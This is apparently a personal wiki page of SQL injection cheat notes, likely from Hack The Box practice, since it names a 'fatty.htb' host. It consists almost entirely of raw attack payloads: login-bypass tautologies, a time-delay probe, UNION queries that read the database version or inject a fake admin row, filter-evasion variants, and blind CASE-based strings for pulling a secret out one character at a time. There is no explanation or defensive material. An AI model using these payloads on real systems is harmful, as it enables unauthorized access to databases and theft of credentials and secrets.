Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-12T11:01:15-04:00

====== sql injection ======
Created Tuesday 12 May 2020

**test '  OR 1=1;--**

**tom’ or 1=1;#**

**test' (sleep 5)**

**id=1 union all select 1, 2, @@version**


====== byass ======

**' or 6=6**
**' or 0x47=0x47**
**or char(32)=' '**
**or 6 is not null**


====== union ======

**xyz' union all select 999,'qtc','qtc@fatty.htb','oxybro1' as password,'admin' as role from users where username = 'qtc**

====== Then case ======

**xyz' AND (SELECT CASE WHEN ((SELECT count(username) FROM users WHERE role=1) = "+str(i)+") THEN 1 ELSE MATCH(1,1) END))--**

**xyz'  AND (SELECT CASE WHEN ((SELECT hex(substr(secret,"+str(i+1)+",1)) FROM users WHERE role=1) = hex('"+str(c)+"')) THEN 1 ELSE MATCH(1,1) END))--**
